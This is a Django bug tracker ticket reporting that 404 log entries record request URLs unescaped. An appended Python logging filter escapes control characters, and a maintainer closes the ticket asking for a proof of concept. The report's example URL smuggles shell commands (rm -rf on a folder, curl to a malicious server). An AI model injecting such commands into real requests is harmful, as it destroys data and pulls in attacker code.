Opened 2 years ago

Closed 2 years ago

#33610 closed Bug (needsinfo)

Django does not escape the request url in default logging mechanism and may be vulnerable to remote code execution

Reported by: DJD Owned by: nobody
Component: Utilities Version: 4.0
Severity: Normal Keywords:
Cc: Triage Stage: Unreviewed
Has patch: no Needs documentation: no
Needs tests: no Patch needs improvement: no
Easy pickings: no UI/UX: no

Description

Issue:

When logging is enabled in Django, the log_response method in log.py of the django.utils package logs the given URL in the log file as-is, without escaping it, which may lead to remote code execution.

For example:
An attacker hits the Django project with this URL: <hostname>/cgi-bin;cd /var/temp;rm -rf <any folder>; curl <malicious remote server url>

In this case we can see the log file entry with a warning (yes, because of the 404 Not Found error the level is warning) containing the given URL as-is. IMHO we should escape the request/response logging so as to minimise the remote code execution possibilities.
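An added example, not Django's code and not part of the report: the escaping the ticket asks for, done as a handler-level logging filter. It leaves the URL's printable text untouched (a logged line is data; nothing executes it) and rewrites only control characters, so a single request path can never span more than one log line. The logger name and the "Not Found: %s" harness are constructed here to mirror the shape of Django's 404 message and are assumptions, not Django's wiring.

```python
import logging
from io import StringIO


def escape_for_log(text: str) -> str:
    """Rewrite non-printable characters as \\xNN / \\uNNNN escapes.

    Printable text, including the ';', '/' and spaces in the ticket's example
    URL, is kept verbatim. What is worth neutralising is anything that alters
    line structure or terminal state (newline, carriage return, ESC, other
    control characters), because that is what lets one request forge entries.
    """
    out = []
    for ch in text:
        if ch.isprintable():
            out.append(ch)
        else:
            cp = ord(ch)
            out.append(f"\\x{cp:02x}" if cp < 0x100 else f"\\u{cp:04x}")
    return "".join(out)


class EscapeMessageFilter(logging.Filter):
    """Handler filter: escape the fully interpolated message before it is written."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = escape_for_log(record.getMessage())
        record.args = ()  # already interpolated; nothing left for the formatter to do
        return True


def log_not_found(path: str) -> str:
    """Emit a 'Not Found: <path>' warning through a demo logger and return the
    single line that was written. Constructed harness; not Django's log_response."""
    buf = StringIO()
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(name)s %(message)s"))
    handler.addFilter(EscapeMessageFilter())
    logger = logging.getLogger("demo.django.request")  # constructed name, not Django's logger
    logger.handlers = [handler]
    logger.propagate = False
    logger.setLevel(logging.WARNING)
    logger.warning("Not Found: %s", path)  # same message shape as a Django 404 log line
    return buf.getvalue().rstrip("\n")


if __name__ == "__main__":
    # The ticket's URL is written as plain text; a path containing a newline stays on one line.
    print(log_not_found("/cgi-bin;cd /var/temp;rm -rf /some/folder; curl http://example.invalid/"))
    print(log_not_found("/ok\nERROR demo.django.request second entry"))
```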

Change History (1)

comment:1 by Carlton Gibson, 2 years ago

Resolution: needsinfo
Status: new → closed

Please don't report security issues here! Contact security@… instead.

It's not clear how logging leads to a code execution but please send a full proof of concept to security@… and we can review.
Thanks.
